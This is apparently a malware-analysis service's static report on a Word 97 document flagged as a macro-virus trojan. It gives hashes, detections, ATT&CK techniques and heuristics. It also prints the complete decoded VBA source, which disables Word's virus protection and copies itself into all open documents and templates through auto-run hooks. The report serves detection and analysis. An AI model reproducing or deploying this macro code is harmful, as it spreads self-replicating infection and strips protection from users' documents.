Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eeb7b95fdf7082e4…

MALICIOUS

Office (OLE)

40.5 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-22
MD5: 46428f466a7c89e81c209f8977d7a3c0 SHA-1: e2f0e2fe9a48d200617245cf3366322615dafb80 SHA-256: eeb7b95fdf7082e447c101f97e742d4e42be7ebf3de64bcf87bd405aae483290
236 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1553.005 Mark-of-the-Web Bypass

The sample contains VBA macros that disable Word's virus protection and attempt to replicate themselves into other open documents and templates using the OrganizerCopy function. This self-replication behavior is a strong indicator of a macro-based trojan. The ClamAV detections further support its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.CopyTest-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.CopyTest-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Word.Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
        Application.OrganizerCopy s, d, "AutoOpen", wdOrganizerObjectProjectItems
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
        Application.OrganizerCopy s, d, "AutoClose", wdOrganizerObjectProjectItems
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2393 bytes
SHA-256: 9911413c8dcfeea0939e9e396365238c1d88c373bf977cd036193f7d27aabf7c
Detection
ClamAV: Win.Trojan.Alicia-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Infect"
Sub MAIN()
    
    myname = ThisDocument.FullName
    Word.Options.VirusProtection = False
    
    For Each d In Word.Documents
        If (d.FullName <> myname) Then
            Debug.Print myname + " -> " + d.FullName
            Call CopyMacros(myname, d.FullName)
        End If
    Next d
    
    For Each t In Word.Templates
        If (t.FullName <> myname) Then
            Call CopyMacros(myname, t.FullName)
        End If
    Next t
    Rem Application.OrganizerCopy "d:\test2.doc", "d:\test1.doc", "Test", 3
End Sub

Sub CopyMacros(ByVal s As String, ByVal d As String)
    On Error GoTo AlreadyInfected

    Application.OrganizerCopy s, d, "Infect", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExec", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoOpen", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExit", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSave", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSaveAs", wdOrganizerObjectProjectItems

AlreadyInfected:
End Sub

Sub SaveDoc()
    If (Application.ActiveDocument.Saved = False) Then
        If (Application.ActiveDocument.Path <> "") Then
            Application.ActiveDocument.Save
        End If
    End If
End Sub

Attribute VB_Name = "AutoClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "AutoExec"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "AutoOpen"
Sub MAIN()
    Infect.MAIN
End Sub

Attribute VB_Name = "AutoExit"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "FileSave"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileSaveAs"
Sub MAIN()
    Infect.MAIN
    Word.Dialogs(wdDialogFileSaveAs).Show
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.